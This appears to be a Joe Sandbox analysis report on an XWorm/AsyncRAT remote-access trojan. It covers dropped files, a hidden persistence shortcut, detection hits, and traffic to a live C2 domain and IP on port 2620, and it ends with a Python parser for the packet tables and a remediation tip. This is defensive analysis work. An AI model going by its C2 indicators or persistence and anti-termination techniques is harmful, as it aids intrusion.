                                          Entropy (8bit):3.598349098128234
                                          Encrypted:false
                                          SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                          MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                          SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                          SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                          SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:....### explorer ###..[WIN]r
                                          Process:C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 1 15:30:59 2024, mtime=Fri Nov 1 15:30:59 2024, atime=Fri Nov 1 15:30:59 2024, length=154624, window=hide
                                          Category:dropped
                                          Size (bytes):776
                                          Entropy (8bit):5.035356313092386
                                          Encrypted:false
                                          SSDEEP:12:8DWCI4wFiWCSgdY//s9klLxgmu8YZOjALrH/qX4idBmV:8KOW94+k9Q4JIALDqX4idBm
                                          MD5:C73ED24D6B6E83BDA634185D7FA7DB7F
                                          SHA1:8306605EB56F805EAE73D26CABF1988D7739F942
                                          SHA-256:33E940C884460F9C11F9B8FECBC820D14066A7E3D587B2DCE56F6BCE1DB6B65E
                                          SHA-512:4B18A9A05400774837761F00AE9A52CCC220C5C195C4E6CDE681CC6FFF415B6B971B272D22286CE17019BE0E5A762E12EA84D1AF4866C5BD31AAECD498FF21B1
                                          Malicious:false
                                          Reputation:low
                                          Preview:L..................F.... ...U.Yo{,..U.Yo{,..U.Yo{,...\......................|.:..DG..Yr?.D..U..k0.&...&......vk.v.....Nuh{,...6vo{,......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^aY............................%..A.p.p.D.a.t.a...B.V.1.....aY...Roaming.@......CW.^aY............................$..R.o.a.m.i.n.g.....h.2..\..aY.. .X-MANA~1.EXE..L......aY..aY................................x.-.m.a.n.a.g.e.r...e.x.e.......[...............-.......Z............556.....C:\Users\user\AppData\Roaming\x-manager.exe........\.....\.....\.....\.....\.x.-.m.a.n.a.g.e.r...e.x.e.`.......X.......562258...........hT..CrF.f4... .}T..b...,.......hT..CrF.f4... .}T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                          Process:C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):154624
                                          Entropy (8bit):6.043231723341007
                                          Encrypted:false
                                          SSDEEP:3072:wxqxFiFO9W2OMJ4NpVq8BxFRzaqF+o2GQJ7/JzqVfGvO:wxqiO9BgVqwlL
                                          MD5:FB84F0C948174966776DB1E4592FDC75
                                          SHA1:178B6CE2DDD9DE88D5E6B39C212254B50D45CFD7
                                          SHA-256:58E5F9CAA04676B6269B870CC4AA3997287FD3A038D1DF59E5BD2C41B75BBD62
                                          SHA-512:22874247132885D150E12D2E649690C296EF40EAA85F69CA90A9207CE1CE56C1FFEF488875936166F18E9F5FFB06AEB4A4FE6EDF01B0DCD9D6A64B43A6C36114
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\x-manager.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\x-manager.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 84%
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Di.f............................n.... ........@.. ....................................@.....................................O.......T............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc...T...........................@..@.reloc...............Z..............@..B................P.......H........W..$U............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):6.043231723341007
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                                          File size:154'624 bytes
                                          MD5:fb84f0c948174966776db1e4592fdc75
                                          SHA1:178b6ce2ddd9de88d5e6b39c212254b50d45cfd7
                                          SHA256:58e5f9caa04676b6269b870cc4aa3997287fd3a038d1df59e5bd2c41b75bbd62
                                          SHA512:22874247132885d150e12d2e649690c296ef40eaa85f69ca90a9207ce1ce56c1ffef488875936166f18e9f5ffb06aeb4a4fe6edf01b0dcd9d6a64b43a6c36114
                                          SSDEEP:3072:wxqxFiFO9W2OMJ4NpVq8BxFRzaqF+o2GQJ7/JzqVfGvO:wxqiO9BgVqwlL
                                          TLSH:4FE3A2698EEBB242C54A54747D7363824B395F79A4CF75158EE33FAE1BB3C9410230A2
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Di.f............................n.... ........@.. ....................................@................................
                                          Icon Hash:073149cccc490307
                                          Entrypoint:0x40ad6e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x66FD6944 [Wed Oct 2 15:39:48 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xad1c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x1c954 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8d74 | 0x8e00 | 5b79fcef0f076d0d5a575f4bb32d2841 | False | 0.49942231514084506 | data | 5.728970562657005 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x1c954 | 0x1ca00 | 692918a80109b1f62c5223d3b9869eb6 | False | 0.2493773881004367 | data | 5.818572371473846 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2a000 | 0xc | 0x200 | bad233d3fe1f2b72973dfc5b47cb596b | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc220 | 0x3da8 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9980993411049164
RT_ICON | 0xffc8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.08706967940376198
RT_ICON | 0x207f0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | | | 0.16963863958431744
RT_ICON | 0x24a18 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.22697095435684647
RT_ICON | 0x26fc0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.3351313320825516
RT_ICON | 0x28068 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.5904255319148937
RT_GROUP_ICON | 0x284d0 | 0x5a | data | | | 0.7222222222222222
RT_VERSION | 0x2852c | 0x23c | data | | | 0.4755244755244755
RT_MANIFEST | 0x28768 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-01T17:31:15.782631+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.4 | 49731 | TCP
2024-11-01T17:31:55.570005+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49742 | TCP
2024-11-01T17:32:16.498273+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49829 | 147.185.221.23 | 2620 | TCP
2024-11-01T17:33:14.873431+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 50014 | 147.185.221.23 | 2620 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Nov 1, 2024 17:34:38.904629946 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:38.909679890 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.279906988 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.285207987 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.295253038 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.301474094 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.310930014 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.318079948 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.326483011 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.331841946 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.373437881 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.378348112 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.420275927 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.426070929 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.435844898 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.443576097 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.451445103 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.456458092 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.514007092 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.520230055 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.545202017 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.552844048 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.576519012 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.587944984 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.592134953 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.607914925 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:40.607980013 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:40.623020887 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:43.558231115 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:43.558296919 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:45.627214909 CET500222620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:45.632642984 CET262050022147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:45.694677114 CET500232620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:45.699644089 CET262050023147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:45.704365969 CET500232620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:45.820908070 CET500232620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:45.826107979 CET262050023147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:45.967261076 CET500232620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:45.972153902 CET262050023147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:45.982789993 CET500232620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:45.987732887 CET262050023147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:46.170363903 CET500232620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:46.175287008 CET262050023147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:46.201468945 CET500232620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:46.206470966 CET262050023147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:51.279658079 CET500232620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:51.284631968 CET262050023147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:54.187338114 CET262050023147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:54.187454939 CET500232620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:56.623296022 CET500232620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:56.628452063 CET262050023147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:56.628489017 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:56.633416891 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:56.633605003 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:56.775607109 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:56.780932903 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:56.858128071 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:56.863315105 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:56.935892105 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:56.940990925 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:56.967082977 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:56.972870111 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:57.076507092 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:57.082726955 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:57.092350960 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:57.097394943 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:57.686577082 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:57.922655106 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:57.922738075 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:57.928939104 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:35:01.107830048 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:01.113015890 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:35:05.124253035 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:35:05.124326944 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:06.108619928 CET500252620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:06.108617067 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:06.113920927 CET262050025147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:35:06.113938093 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:35:06.114131927 CET500252620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:06.268313885 CET500252620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:06.273886919 CET262050025147.185.221.23192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 1, 2024 17:31:05.496584892 CET | 63898 | 53 | 192.168.2.4 | 1.1.1.1
Nov 1, 2024 17:31:05.622852087 CET | 53 | 63898 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 1, 2024 17:31:05.496584892 CET | 192.168.2.4 | 1.1.1.1 | 0xb7d6 | Standard query (0) | browser-hazard.gl.at.ply.gg | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 1, 2024 17:31:05.622852087 CET | 1.1.1.1 | 192.168.2.4 | 0xb7d6 | No error (0) | browser-hazard.gl.at.ply.gg | | 147.185.221.23 | A (IP address) | IN (0x0001) | false
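The packet tables above come from the report's text export, where the cells of each row are run together with no separator (for example 50020, 2620, 192.168.2.4 and 147.185.221.23 appear as "500202620192.168.2.4147.185.221.23"). The Python below is an added example, not part of the Joe Sandbox report, that recovers structured rows from that flattened form and summarises which remote endpoints the guest talked to. The sample rows are constructed from this page's TCP and DNS tables; the hint values (the sandbox guest 192.168.2.4, the resolver 1.1.1.1, the C2 address 147.185.221.23 and the ports 53 and 2620) are taken from the same tables, and the function names are the example's own.

```python
"""Recover structured rows from the flattened Joe Sandbox packet tables.

In the text export the cells of a row are run together, e.g.
    Nov 1, 2024 17:34:19.654890060 CET500202620192.168.2.4147.185.221.23
is timestamp, source port 50020, dest port 2620, source IP 192.168.2.4 and
dest IP 147.185.221.23. The split is ambiguous in general, so this parser
anchors on the sandbox guest address, enumerates every split that satisfies
the port and IPv4 syntax rules, narrows with hints the report establishes
elsewhere (peer addresses, service ports), and rejects rows that remain
ambiguous instead of guessing.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import NamedTuple

GUEST_IP = "192.168.2.4"  # sandbox guest address, from the report
_ROW = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) CET(?P<rest>[\d.]+)$")

# Constructed from this page's DNS and TCP tables (a few rows are enough).
SAMPLE_ROWS = [
    "Nov 1, 2024 17:31:05.496584892 CET6389853192.168.2.41.1.1.1",
    "Nov 1, 2024 17:31:05.622852087 CET53638981.1.1.1192.168.2.4",
    "Nov 1, 2024 17:34:19.654890060 CET500202620192.168.2.4147.185.221.23",
    "Nov 1, 2024 17:34:19.663518906 CET262050020147.185.221.23192.168.2.4",
    "Nov 1, 2024 17:34:24.768826962 CET500212620192.168.2.4147.185.221.23",
    "Nov 1, 2024 17:34:35.062978029 CET500222620192.168.2.4147.185.221.23",
    "Nov 1, 2024 17:35:06.108619928 CET500252620192.168.2.4147.185.221.23",
]
# Side information from the same report: resolver and C2 address, DNS and C2 ports.
HINTS = {"known_peers": {"1.1.1.1", "147.185.221.23"}, "known_ports": {53, 2620}}


class Packet(NamedTuple):
    ts: datetime
    sport: int
    dport: int
    src: str
    dst: str


def _valid_port(s: str) -> bool:
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 65535


def _valid_ipv4(s: str) -> bool:
    octets = s.split(".")
    return len(octets) == 4 and all(
        o.isdigit() and (o == "0" or o[0] != "0") and int(o) <= 255 for o in octets)


def _port_splits(digits: str):
    """Every way to cut a digit run into two syntactically valid ports."""
    return [(int(digits[:k]), int(digits[k:])) for k in range(1, len(digits))
            if _valid_port(digits[:k]) and _valid_port(digits[k:])]


def candidate_parses(line: str) -> list:
    """All readings of one flattened row that have GUEST_IP at one end."""
    m = _ROW.match(line.strip())
    if not m:
        raise ValueError(f"not a packet row: {line!r}")
    ts = datetime.strptime(m["ts"][:-3], "%b %d, %Y %H:%M:%S.%f")  # %f takes 6 digits, export has 9
    rest, cands = m["rest"], []
    if rest.endswith(GUEST_IP):                     # guest is the destination
        body = rest[: -len(GUEST_IP)]               # ports + source IP
        for i in range(1, body.find(".") + 1):      # source IP starts inside the first digit run
            ports, src = body[:i], body[i:]
            if _valid_ipv4(src):
                cands += [Packet(ts, a, b, src, GUEST_IP) for a, b in _port_splits(ports)]
    idx = rest.find(GUEST_IP)                       # guest is the source
    while idx != -1:
        ports, dst = rest[:idx], rest[idx + len(GUEST_IP):]
        if ports.isdigit() and _valid_ipv4(dst):
            cands += [Packet(ts, a, b, GUEST_IP, dst) for a, b in _port_splits(ports)]
        idx = rest.find(GUEST_IP, idx + 1)
    return cands


def parse_row(line: str, known_peers=(), known_ports=()) -> Packet:
    """Parse one row; hints are applied only when the syntax alone is ambiguous."""
    cands = candidate_parses(line)
    for keep in (lambda p: p.src in known_peers or p.dst in known_peers,
                 lambda p: p.sport in known_ports or p.dport in known_ports):
        if len(cands) > 1:
            cands = [p for p in cands if keep(p)] or cands
    if len(cands) != 1:
        raise ValueError(f"{len(cands)} valid readings of {line!r}: {cands}")
    return cands[0]


def parse_all(rows=SAMPLE_ROWS, hints=HINTS) -> list:
    return [parse_row(r, **hints) for r in rows]


def endpoints(packets) -> dict:
    """Remote (ip, port) -> sorted guest ports that talked to it (one TCP connection each)."""
    seen = defaultdict(set)
    for p in packets:
        if p.src == GUEST_IP:
            seen[(p.dst, p.dport)].add(p.sport)
        else:
            seen[(p.src, p.sport)].add(p.dport)
    return {k: sorted(v) for k, v in seen.items()}


if __name__ == "__main__":
    for peer, ports in endpoints(parse_all()).items():
        print(f"{peer[0]}:{peer[1]} <- guest ports {ports}")
```

The point that carries over to other sandbox exports: the concatenated cells are lossy. The row for client port 50021 can also be read as source port 5002 and destination port 12620, and the DNS reply row has nine syntactically valid readings, so a regex that takes the first valid split will misreport ports without any error. Enumerating every valid split and narrowing only with facts already established elsewhere in the report keeps the parse honest and surfaces the rows that genuinely cannot be decided.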


                                          Target ID:0
                                          Start time:12:30:55
                                          Start date:01/11/2024
                                          Path:C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe"
                                          Imagebase:0xc50000
                                          File size:154'624 bytes
                                          MD5 hash:FB84F0C948174966776DB1E4592FDC75
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:false


                                            Execution Graph

                                            Execution Coverage:20.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0
execution_graph
  4314: 7ffd9b88227d
  4315: 7ffd9b8822af  RtlSetProcessIsCritical
  4317: 7ffd9b882362
  4310: 7ffd9b8827a8
  4311: 7ffd9b8827b1  SetWindowsHookExW
  4313: 7ffd9b882881
  edges: 4314 -> 4315, 4315 -> 4317, 4310 -> 4311, 4311 -> 4313

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4109366724.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af67612922.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CAO_^
                                            • API String ID: 0-3111533842
                                            • Opcode ID: 3ac7834d607379049ebae022b5c56a4311dc38dddbcb7aa12da9a87a5e59eeef
                                            • Instruction ID: acff2d001eefb20c547e742205ea78c0c5619abd93bc407a481b8ab5ac7b8a40
                                            • Opcode Fuzzy Hash: 3ac7834d607379049ebae022b5c56a4311dc38dddbcb7aa12da9a87a5e59eeef
                                            • Instruction Fuzzy Hash: 08220920B29E494FE7A8FB788865AB977D2EF9C704F44007DE45DC32D6DE38A9418781

                                            Control-flow Graph

Control-flow graph (rendered in the original report, with executed and not-executed blocks colour-coded): function at 7ffd9b8889b6, basic blocks spanning 7ffd9b8889b6-7ffd9b888e73, one call to 7ffd9b888e74.
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4109366724.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af67612922.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a93352d3994c8dd454a0abc9848ee8b1b4eb3b25520a3133065e037ac5d24913
                                            • Instruction ID: bfe0d1d491e14ef2faac7a99055f9e245d6e1da8aba38e98b7bc74520757d1f6
                                            • Opcode Fuzzy Hash: a93352d3994c8dd454a0abc9848ee8b1b4eb3b25520a3133065e037ac5d24913
                                            • Instruction Fuzzy Hash: FBF1B830A09E4D8FEBA8DF28D8557E937D1FF58310F04426EE85DC72A5DB34A9458B82

                                            Control-flow Graph

Control-flow graph (rendered in the original report, with executed and not-executed blocks colour-coded): function at 7ffd9b889762, basic blocks spanning 7ffd9b889762-7ffd9b889bef, one call to 7ffd9b889bf0.
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4109366724.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af67612922.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 023237a13004678e9f19986a4a5445f4bc8c5b1a152368b36bc6bb072f6aaac8
                                            • Instruction ID: a0925277062244cff6b77ff899d397231f3e2ac0f4c06ef9ef944067d73dd9ab
                                            • Opcode Fuzzy Hash: 023237a13004678e9f19986a4a5445f4bc8c5b1a152368b36bc6bb072f6aaac8
                                            • Instruction Fuzzy Hash: 39E1E630A09A4E8FEBA8DF28C8557E977D1FF58310F04466ED85DC72A5CF74A9418B81

                                            Control-flow Graph

Control-flow graph (rendered in the original report, with executed and not-executed blocks colour-coded):
  154: 7ffd9b88227d-7ffd9b882360  calls RtlSetProcessIsCritical
  158: 7ffd9b882362
  159: 7ffd9b882368-7ffd9b88239d
  edges: 154 -> 158, 154 -> 159, 158 -> 159
RtlSetProcessIsCritical sets the process's BreakOnTermination flag (the "Protects its processes via BreakOnTermination flag" signature in the overview); once set, terminating the process triggers a CRITICAL_PROCESS_DIED bugcheck, so clear the flag, or suspend rather than kill the process, before removing it from a live host.
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4109366724.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
